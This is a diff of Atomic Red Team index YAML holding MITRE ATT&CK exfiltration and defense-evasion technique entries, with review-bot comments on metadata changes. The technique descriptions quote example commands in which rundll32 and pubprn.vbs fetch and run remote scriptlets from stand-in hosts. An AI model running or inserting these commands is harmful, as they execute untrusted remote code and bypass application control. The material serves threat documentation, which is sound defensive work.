- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1011.001:
technique:
@@ -60696,7 +61584,7 @@ exfiltration:
- source_name: mitre-attack
external_id: T1011.001
url: https://attack.mitre.org/techniques/T1011/001
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-08T21:02:15.802Z'
name: Exfiltration Over Bluetooth
description: |-
Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an adversary may opt to exfiltrate data using a Bluetooth communication channel.
@@ -60718,8 +61606,6 @@ exfiltration:
- 'File: File Access'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1020:
technique:
@@ -60773,7 +61659,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1020
atomic_tests: []
T1048.001:
@@ -60798,7 +61683,7 @@ exfiltration:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-28T00:43:24.228Z'
name: Exfiltration Over Symmetric Encrypted Non-C2 Protocol
description: "Adversaries may steal data by exfiltrating it over a symmetrically
encrypted network protocol other than that of the existing command and control
@@ -60833,12 +61718,10 @@ exfiltration:
- 'Command: Command Execution'
- 'File: File Access'
- 'Network Traffic: Network Connection Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1020.001:
technique:
- modified: '2023-04-14T23:23:30.327Z'
+ modified: '2024-10-15T16:08:13.273Z'
name: Traffic Duplication
description: |-
Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised infrastructure. Traffic mirroring is a native feature for some devices, often used for network analysis. For example, devices may be configured to forward network traffic to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring)(Citation: Juniper Traffic Mirroring)
@@ -60863,11 +61746,10 @@ exfiltration:
x_mitre_platforms:
- Network
- IaaS
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Network Traffic: Network Connection Creation'
- 'Network Traffic: Network Traffic Flow'
- x_mitre_network_requirements: false
type: attack-pattern
id: attack-pattern--7c46b364-8496-4234-8a56-f7e6727e21e1
created: '2020-10-19T13:40:11.118Z'
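Review bot: besides the `x_mitre_version` bump from 1.2 to 1.3, this hunk silently drops `x_mitre_network_requirements: false` from T1020.001 (the same key disappears from T1048 further down). If the upstream object at version 1.3 no longer carries that field the change is correct, but if the generator is now omitting keys it does not recognise, the version bump masks a data loss; please spot-check the removed key against the upstream object.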
@@ -60910,9 +61792,8 @@ exfiltration:
url: https://www.us-cert.gov/ncas/alerts/TA18-106A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1567.001:
technique:
@@ -60959,7 +61840,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1048.002:
technique:
@@ -60985,7 +61865,7 @@ exfiltration:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-15T22:44:11.953Z'
name: Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric
Encrypted Non-C2 Protocol
description: "Adversaries may steal data by exfiltrating it over an asymmetrically
@@ -61018,13 +61898,11 @@ exfiltration:
- 'File: File Access'
- 'Network Traffic: Network Connection Creation'
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1048.002
atomic_tests: []
T1041:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-07T17:09:14.040Z'
name: Exfiltration Over C2 Channel
description: Adversaries may steal data by exfiltrating it over an existing
command and control channel. Stolen data is encoded into the normal communications
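Review bot: the `modified` values being replaced by an earlier date in this hunk and its neighbours (`2022-04-25T14:00:00.188Z` for T1048.002, `2023-05-09T14:00:00.188Z` for T1041) all carry the same `.188Z` millisecond stamp, most of them exactly `T14:00:00.188Z`, which reads as an upstream batch edit rather than per-object edits, and the objects that regress are the same ones that lose `x_mitre_attack_spec_version: 2.1.0` (T1048.002 here). That matches reading objects that predate the batch edit, i.e. a source missing it, rather than a newer release; confirm the bundle source before merging.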
@@ -61073,12 +61951,11 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1041
atomic_tests: []
T1048:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:57:26.415Z'
name: Exfiltration Over Alternative Protocol
description: "Adversaries may steal data by exfiltrating it over a different
protocol than that of the existing command and control channel. The data may
@@ -61114,12 +61991,11 @@ exfiltration:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- Network
- x_mitre_version: '1.4'
+ - Office Suite
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Cloud Storage: Cloud Storage Access'
- 'Network Traffic: Network Traffic Flow'
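Review bot: T1048 loses the `Office 365` and `Google Workspace` platforms and gains `Office Suite` (version 1.4 to 1.5); the same rename lands on T1537 and T1564.008 later in this diff. Any index or filter that selects techniques by the old platform strings will now miss these entries, so the per-platform index generator needs `Office Suite` mapped to the google-workspace and office-365 outputs, otherwise the next regeneration silently empties them of these techniques.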
@@ -61128,7 +62004,6 @@ exfiltration:
- 'Application Log: Application Log Content'
- 'File: File Access'
- 'Network Traffic: Network Connection Creation'
- x_mitre_network_requirements: false
type: attack-pattern
id: attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776
created: '2017-05-31T21:30:44.720Z'
@@ -61152,9 +62027,8 @@ exfiltration:
url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1048
atomic_tests: []
T1052.001:
@@ -61177,7 +62051,7 @@ exfiltration:
- source_name: mitre-attack
external_id: T1052.001
url: https://attack.mitre.org/techniques/T1052/001
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-15T22:48:29.490Z'
name: Exfiltration over USB
description: Adversaries may attempt to exfiltrate data over a USB connected
physical device. In certain circumstances, such as an air-gapped network compromise,
@@ -61199,8 +62073,6 @@ exfiltration:
- 'Command: Command Execution'
x_mitre_system_requirements:
- Presence of physical medium or device
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1567.003:
technique:
@@ -61251,7 +62123,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1567.003
atomic_tests: []
T1567.002:
@@ -61301,7 +62172,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1567.002
atomic_tests: []
T1030:
@@ -61326,7 +62196,7 @@ exfiltration:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-07-14T19:47:46.912Z'
name: Data Transfer Size Limits
description: An adversary may exfiltrate data in fixed size chunks instead of
whole files or limit packet sizes below certain thresholds. This approach
@@ -61349,13 +62219,11 @@ exfiltration:
- 'Network Traffic: Network Connection Creation'
- 'Network Traffic: Network Traffic Flow'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1030
atomic_tests: []
T1537:
technique:
- modified: '2024-04-11T15:53:00.577Z'
+ modified: '2024-10-15T16:08:25.344Z'
name: Transfer Data to Cloud Account
description: "Adversaries may exfiltrate data by transferring the data, including
through sharing/syncing and creating backups of cloud environments, to another
@@ -61396,9 +62264,8 @@ exfiltration:
x_mitre_platforms:
- IaaS
- SaaS
- - Google Workspace
- - Office 365
- x_mitre_version: '1.4'
+ - Office Suite
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Cloud Storage: Cloud Storage Modification'
- 'Snapshot: Snapshot Creation'
@@ -61446,7 +62313,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1052:
technique:
@@ -61468,7 +62334,7 @@ exfiltration:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1052
external_id: T1052
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-15T22:48:29.702Z'
name: Exfiltration Over Physical Medium
description: Adversaries may attempt to exfiltrate data via a physical medium,
such as a removable drive. In certain circumstances, such as an air-gapped
@@ -61492,12 +62358,10 @@ exfiltration:
x_mitre_system_requirements:
- Presence of physical medium or device
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1048.003:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-12T23:39:25.476Z'
name: 'Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated
Non-C2 Protocol'
description: "Adversaries may steal data by exfiltrating it over an un-encrypted
@@ -61561,6 +62425,5 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1048.003
atomic_tests: []
diff --git a/atomics/Indexes/saas-index.yaml b/atomics/Indexes/saas-index.yaml
index 1ac83b1d66..44ed384822 100644
--- a/atomics/Indexes/saas-index.yaml
+++ b/atomics/Indexes/saas-index.yaml
@@ -45,7 +45,7 @@ defense-evasion:
description: Microsoft. (n.d.). SendNotifyMessage function. Retrieved December
16, 2017.
source_name: Microsoft SendNotifyMessage function
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.004Z'
name: 'Process Injection: Extra Window Memory Injection'
description: "Adversaries may inject malicious code into process via Extra Window
Memory (EWM) in order to evade process-based defenses as well as possibly
@@ -97,13 +97,11 @@ defense-evasion:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.011
atomic_tests: []
T1205.002:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-20T19:56:18.579Z'
name: Socket Filters
description: |-
Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
@@ -166,21 +164,27 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1027.011:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-10-04T15:05:25.388Z'
name: Fileless Storage
description: "Adversaries may store data in \"fileless\" formats to conceal
malicious activity from defenses. Fileless storage can be broadly defined
as any format other than a file. Common examples of non-volatile fileless
- storage include the Windows Registry, event logs, or WMI repository.(Citation:
- Microsoft Fileless)(Citation: SecureList Fileless)\n\nSimilar to fileless
- in-memory behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620)
+ storage in Windows systems include the Windows Registry, event logs, or WMI
+ repository.(Citation: Microsoft Fileless)(Citation: SecureList Fileless) In
+ Linux systems, shared memory directories such as `/dev/shm`, `/run/shm`, `/var/run`,
+ and `/var/lock` may also be considered fileless storage, as files written
+ to these directories are mapped directly to RAM and not stored on the disk.(Citation:
+ Elastic Binary Executed from Shared Memory Directory)(Citation: Akami Frog4Shell
+ 2024)(Citation: Aquasec Muhstik Malware 2024)\n\nSimilar to fileless in-memory
+ behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620)
and [Process Injection](https://attack.mitre.org/techniques/T1055), fileless
data storage may remain undetected by anti-virus and other endpoint security
- tools that can only access specific file formats from disk storage.\n\nAdversaries
+ tools that can only access specific file formats from disk storage. Leveraging
+ fileless storage may also allow adversaries to bypass the protections offered
+ by read-only file systems in Linux.(Citation: Sysdig Fileless Malware 23022)\n\nAdversaries
may use fileless storage to conceal various types of stored data, including
payloads/shellcode (potentially being used as part of [Persistence](https://attack.mitre.org/tactics/TA0003))
and collected data not yet exfiltrated from the victim (e.g., [Local Data
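Review bot: the new citation tags `(Citation: Akami Frog4Shell 2024)` and `(Citation: Sysdig Fileless Malware 23022)` carry upstream typos (the referenced URL is on akamai.com, and 23022 looks like 2022), but they are ATT&CK's own `source_name` keys and the reference entries added later in this file use the same spellings, so do not hand-correct one side; the description and the `external_references` must keep matching. The substantive change here is the Linux shared-memory directories (`/dev/shm`, `/run/shm`, `/var/run`, `/var/lock`) and the read-only filesystem bypass sentence, which the re-wrapping of the paragraph makes harder to see.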
@@ -200,6 +204,7 @@ defense-evasion:
- Mark Wee
- Simona David
- Xavier Rousseau
+ - Vito Alfano, Group-IB
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -207,10 +212,12 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.0'
+ - Linux
+ x_mitre_version: '2.0'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Creation'
- 'WMI: WMI Creation'
+ - 'Process: Process Creation'
type: attack-pattern
id: attack-pattern--02c5abff-30bf-4703-ab92-1f6072fae939
created: '2023-03-23T19:55:25.546Z'
@@ -220,6 +227,14 @@ defense-evasion:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1027/011
external_id: T1027.011
+ - source_name: Aquasec Muhstik Malware 2024
+ description: " Nitzan Yaakov. (2024, June 4). Muhstik Malware Targets Message
+ Queuing Services Applications. Retrieved September 24, 2024."
+ url: https://www.aquasec.com/blog/muhstik-malware-targets-message-queuing-services-applications/
+ - source_name: Elastic Binary Executed from Shared Memory Directory
+ description: Elastic. (n.d.). Binary Executed from Shared Memory Directory.
+ Retrieved September 24, 2024.
+ url: https://www.elastic.co/guide/en/security/7.17/prebuilt-rule-7-16-3-binary-executed-from-shared-memory-directory.html
- source_name: SecureList Fileless
description: Legezo, D. (2022, May 4). A new secret stash for “fileless” malware.
Retrieved March 23, 2023.
@@ -228,15 +243,22 @@ defense-evasion:
description: Microsoft. (2023, February 6). Fileless threats. Retrieved March
23, 2023.
url: https://learn.microsoft.com/microsoft-365/security/intelligence/fileless-threats
+ - source_name: Sysdig Fileless Malware 23022
+ description: Nicholas Lang. (2022, May 3). Fileless malware mitigation. Retrieved
+ September 24, 2024.
+ url: https://sysdig.com/blog/containers-read-only-fileless-malware/
+ - source_name: Akami Frog4Shell 2024
+ description: Ori David. (2024, February 1). Frog4Shell — FritzFrog Botnet
+ Adds One-Days to Its Arsenal. Retrieved September 24, 2024.
+ url: https://www.akamai.com/blog/security-research/fritzfrog-botnet-new-capabilities-log4shell
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218.011:
technique:
- modified: '2023-08-14T15:35:28.965Z'
+ modified: '2024-10-14T13:14:43.083Z'
name: 'Signed Binary Proxy Execution: Rundll32'
description: "Adversaries may abuse rundll32.exe to proxy execution of malicious
code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)),
@@ -247,10 +269,10 @@ defense-evasion:
also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002)
Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL
and Control_RunDLLAsUser
. Double-clicking a .cpl file also causes
- rundll32.exe to execute. (Citation: Trend Micro CPL)\n\nRundll32 can also
- be used to execute scripts such as JavaScript. This can be done using a syntax
- similar to this: rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication
- \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"
+ rundll32.exe to execute.(Citation: Trend Micro CPL) For example, [ClickOnce](https://attack.mitre.org/techniques/T1127/002)
+ can be proxied through Rundll32.exe.\n\nRundll32 can also be used to execute
+ scripts such as JavaScript. This can be done using a syntax similar to this:
+ rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"
\ This behavior has been seen used by malware such as Poweliks. (Citation:
This is Security Command Line Confusion)\n\nAdversaries may also attempt to
obscure malicious code from analysis by abusing the manner in which rundll32.exe
@@ -286,7 +308,7 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '2.2'
+ x_mitre_version: '2.3'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Command: Command Execution'
@@ -316,7 +338,7 @@ defense-evasion:
- source_name: This is Security Command Line Confusion
description: B. Ancel. (2014, August 20). Poweliks – Command Line Confusion.
Retrieved March 5, 2018.
- url: https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/
+ url: https://www.stormshield.com/news/poweliks-command-line-confusion/
- source_name: Github NoRunDll
description: gtworek. (2019, December 17). NoRunDll. Retrieved August 23,
2021.
@@ -327,9 +349,8 @@ defense-evasion:
url: https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218.011
atomic_tests: []
T1027.009:
@@ -419,49 +440,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Scott Knight, @sdotknight, VMware Carbon Black
- - George Allen, VMware Carbon Black
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
- type: attack-pattern
- created: '2020-06-26T04:01:09.648Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.003
- url: https://attack.mitre.org/techniques/T1556/003
- - source_name: Apple PAM
- url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
- description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
- Retrieved June 25, 2020.
- - source_name: Man Pam_Unix
- url: https://linux.die.net/man/8/pam_unix
- description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
- 25, 2020.
- - source_name: Red Hat PAM
- url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
- description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
- (PAM). Retrieved June 25, 2020.
- - source_name: PAM Backdoor
- url: https://github.com/zephrax/linux-pam-backdoor
- description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
- 25, 2020.
- - source_name: PAM Creds
- url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
- description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
- PAM backdoors & DNS requests. Retrieved June 26, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-21T16:19:55.082Z'
name: 'Modify Authentication Process: Pluggable Authentication Modules'
description: |-
Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so
, which retrieves, sets, and verifies account authentication information in /etc/passwd
and /etc/shadow
.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
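Review bot: almost all of this hunk is key reordering rather than content: `x_mitre_platforms`, `x_mitre_domains`, `x_mitre_contributors`, `id`, `created` and the whole `external_references` list are removed from the top of T1556.003 only to be re-emitted below the data sources in the next hunk. The real change is the `modified` date (2022-05-11 to 2024-08-21). Consider normalising key order in the generator (or sorting keys on output) so future upstream bumps are not dominated by move noise.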
@@ -476,20 +458,57 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Scott Knight, @sdotknight, VMware Carbon Black
+ - George Allen, VMware Carbon Black
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor PAM configuration and module paths (ex: /etc/pam.d/
) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Logon Session: Logon Session Creation'
- x_mitre_permissions_required:
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+ created: '2020-06-26T04:01:09.648Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/003
+ external_id: T1556.003
+ - source_name: Apple PAM
+ description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+ Retrieved June 25, 2020.
+ url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+ - source_name: Man Pam_Unix
+ description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+ 25, 2020.
+ url: https://linux.die.net/man/8/pam_unix
+ - source_name: PAM Creds
+ description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+ PAM backdoors & DNS requests. Retrieved June 26, 2020.
+ url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+ - source_name: Red Hat PAM
+ description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+ (PAM). Retrieved June 25, 2020.
+ url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+ - source_name: PAM Backdoor
+ description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+ 25, 2020.
+ url: https://github.com/zephrax/linux-pam-backdoor
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.003
atomic_tests: []
T1578.004:
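Review bot: this hunk drops `x_mitre_permissions_required: - root` from T1556.003 and adds `revoked: false` and `x_mitre_deprecated: false`, while T1578.004 immediately below still keeps `x_mitre_permissions_required: - User` and loses its spec-version keys. The two objects are therefore at different ATT&CK spec levels within one index file; if the generator is merging objects from different bundle snapshots this is where it shows. Also note the `external_references` order changed (PAM Creds now precedes Red Hat PAM), which is harmless but adds to the diff noise.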
@@ -518,7 +537,7 @@ defense-evasion:
url: https://cloud.google.com/compute/docs/disks/restore-and-delete-snapshots
description: Google. (2019, October 7). Restoring and deleting persistent
disk snapshots. Retrieved October 8, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-03-08T10:33:02.128Z'
name: Revert Cloud Instance
description: |-
An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.
@@ -545,8 +564,6 @@ defense-evasion:
- 'Instance: Instance Modification'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1564.012:
technique:
@@ -588,7 +605,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1222.002:
technique:
@@ -666,7 +682,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1222.002
atomic_tests: []
T1216.001:
@@ -703,7 +718,7 @@ defense-evasion:
Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second script:
parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct
. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.
In later versions of Windows (10+), PubPrn.vbs
has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to LDAP://
, vice the script:
moniker which could be used to reference remote code via HTTP(S).
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-18T14:55:35.817Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Signed Script Proxy Execution: Pubprn'
x_mitre_detection: Monitor script processes, such as `cscript`, and command-line
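Review bot: the description context lines for T1216.001 break mid-sentence around `second script:` / `parameter`, `file.sct` / `. This behavior` and `LDAP://` / `, vice the script:`. If that is how the text is stored in the file rather than an artifact of this view, the inline code spans lost their backticks when the description was rendered into YAML, and the same breakage appears in the T1556.003 description above (`pam_unix.so` / `, which retrieves`). Not introduced by this hunk, but the generator should preserve the code markup.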
@@ -722,7 +737,6 @@ defense-evasion:
- Application Control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1216.001
atomic_tests: []
T1574.007:
@@ -812,7 +826,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1006:
technique:
@@ -870,12 +883,87 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1006
atomic_tests: []
+ T1666:
+ technique:
+ modified: '2024-09-25T16:15:41.224Z'
+ name: Modify Cloud Resource Hierarchy
+ description: "Adversaries may attempt to modify hierarchical structures in infrastructure-as-a-service
